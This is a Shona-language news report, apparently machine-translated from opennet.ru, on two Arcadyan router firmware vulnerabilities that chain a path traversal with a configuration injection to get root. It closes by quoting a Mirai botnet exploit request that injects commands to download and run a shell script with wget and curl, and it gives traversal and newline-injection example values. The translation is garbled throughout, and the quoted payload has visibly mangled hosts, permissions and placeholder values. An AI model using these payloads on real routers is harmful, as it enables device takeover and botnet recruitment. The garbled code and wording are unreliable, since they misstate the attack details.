Kurwiswa kukuru kwakanyorwa panetiweki kurwisa ma routers epamba ayo firmware inoshandisa HTTP server kuita kubva kukambani yeArcadyan. Kuti uwane kutonga pamusoro pemidziyo, musanganiswa wekusagadzikana kuviri kunoshandiswa iyo inobvumira kure kure kuurayiwa kwekodhi ine kodzero dzemidzi. Dambudziko rinokanganisa huwandu hwakasiyana-siyana hweADSL routers kubva kuArcadyan, ASUS neBuffalo, pamwe nemidziyo inopihwa pasi peBeeline brands (dambudziko rinosimbiswa muSmart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone uye vamwe vanofambisa telecom. Zvinocherechedzwa kuti dambudziko rave riripo muArcadyan firmware kweanopfuura makore gumi uye panguva ino yakakwanisa kutamira kune inokwana makumi maviri emhando yemidziyo kubva ku10 vakasiyana vagadziri.
Kusagadzikana kwekutanga, CVE-2021-20090, kunoita kuti zvikwanise kuwana chero webhu interface script pasina humbowo. Izvo zvakakosha zvekusagadzikana ndezvekuti muwebhu interface, mamwe madhairekitori ayo mapikicha, CSS mafaera uye JavaScript zvinyorwa zvinotumirwa zvinosvikika pasina humbowo. Muchiitiko ichi, madhairekitori anotenderwa kuwana pasina humbowo anotariswa uchishandisa yekutanga mask. Kutsanangura mavara e "../" munzira dzekuenda kune dhairekitori yevabereki kwakavharwa neiyo firmware, asi kushandisa "..% 2f" musanganiswa unodarika. Saka, zvinokwanisika kuvhura mapeji akadzivirirwa paunotumira zvikumbiro zvakaita se "http://192.168.1.1/images/..%2findex.htm".
Kusagadzikana kwechipiri, CVE-2021-20091, inobvumira mushandisi ane chokwadi kuti aite shanduko kune sisitimu marongero echishandiso nekutumira akamisikidzwa maparamita kune application_abstract.cgi script, iyo isingatarise kuvepo kweiyo nyowani mutsara muparamita. . Semuenzaniso, paunenge uchiita ping operation, munhu anorwisa anogona kutsanangura kukosha kwe "192.168.1.2%0AARC_SYS_TelnetdEnable=1" mumunda ne IP address iri kuongororwa, uye script, paunenge uchigadzira faira rekugadzirisa /tmp/etc/config/ .glbcfg, ichanyora mutsetse "AARC_SYS_TelnetdEnable=1" mairi ", iyo inomutsa telnetd server, iyo inopa isina kuganhurirwa goko rekuraira kuwana nemidzi kodzero. Saizvozvo, nekuisa iyo AARC_SYS paramende, unogona kuita chero kodhi pane system. Kusagadzikana kwekutanga kunoita kuti zvikwanise kumhanyisa script rine dambudziko pasina huchokwadi nekuwana se "/images/..%2fapply_abstract.cgi".
Kushandisa kusasimba, munhu anorwisa anofanira kukwanisa kutumira chikumbiro kunetiweki port pari kushanda newebhu. Tichitarisa nemasimba ekupararira kwekurwiswa, vashandisi vazhinji vanosiya mukana pamidziyo yavo kubva kune yekunze network kuti kurerutsa kuongororwa kwematambudziko nebasa rekutsigira. Kana kupinda kune iyo interface kunogumira kunetiweki yemukati chete, kurwiswa kunogona kuitwa kubva kune yekunze network uchishandisa iyo "DNS rebinding" nzira. Kusagadzikana kuri kutoshandiswa kubatanidza marouters kuMirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC=212.192.241.7_ping0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Source: opennet.ru